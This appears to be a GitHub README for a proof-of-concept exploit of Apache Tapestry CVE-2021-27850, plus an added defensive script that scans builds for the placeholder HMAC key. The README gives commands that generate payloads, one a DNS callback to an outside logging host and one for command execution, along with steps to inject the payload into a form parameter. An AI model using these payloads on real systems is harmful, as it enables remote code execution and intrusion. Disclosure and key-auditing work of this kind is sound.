Ovi3/CVE_2021_27850_POC

Command usage

git clone https://github.com/Ovi3/CVE_2021_27850_POC.git
cd CVE_2021_27850_POC/
gradlew runnbaleJar

java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar
[Usage]:
        java TapestryExploit [Tapestry Key] DNS [URL]
        java TapestryExploit [Tapestry Key] CB2 [Command]

# Assume the HMAC key is "change this immediately"
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar "change this immediately" DNS "http://xxx.dnslog.cn"
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar "change this immediately" CB2 "calc"

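Reproducing the vulnerability

Visit the Tapestry application, trigger a POST request (for example, a login request), capture it, and change the value of the t:formdata parameter to the payload generated above.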
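The commands above assume the HMAC key is still the placeholder "change this immediately". The following audit script is an added example, not part of this repository: it checks whether a source tree or a deployed WAR/JAR still carries that placeholder. The function names are hypothetical, and it assumes the passphrase appears as a plain ASCII string in source, configuration or compiled classes.

```python
import io
import os
import zipfile

# The placeholder HMAC passphrase the README's commands assume.
PLACEHOLDER = b"change this immediately"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
MAX_DEPTH = 3  # assumption: WAR -> WEB-INF/lib/*.jar nesting is shallow


def scan_bytes(name, data, depth=0):
    """Return names of entries whose bytes contain the placeholder."""
    hits = []
    if name.lower().endswith(ARCHIVE_EXTS) and depth < MAX_DEPTH:
        try:
            # Archive entries are deflated, so they must be unpacked to be searched.
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    if info.is_dir():
                        continue
                    inner = f"{name}!/{info.filename}"
                    hits += scan_bytes(inner, zf.read(info), depth + 1)
            return hits
        except zipfile.BadZipFile:
            pass  # not a real archive: fall through and scan the raw bytes
    if PLACEHOLDER in data:
        hits.append(name)
    return hits


def scan_tree(root):
    """Walk a source or deployment directory and report every hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    hits += scan_bytes(path, fh.read())
            except OSError:
                continue  # unreadable file: skip it
    return sorted(hits)


if __name__ == "__main__":
    import sys
    found = scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".")
    for hit in found:
        print("placeholder HMAC passphrase found in:", hit)
    sys.exit(1 if found else 0)
```

Run it against a build output or deployment directory; a non-zero exit status means the placeholder key is still present and should be replaced with a random secret.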

About

Apache Tapestry CVE-2021-27850 PoC
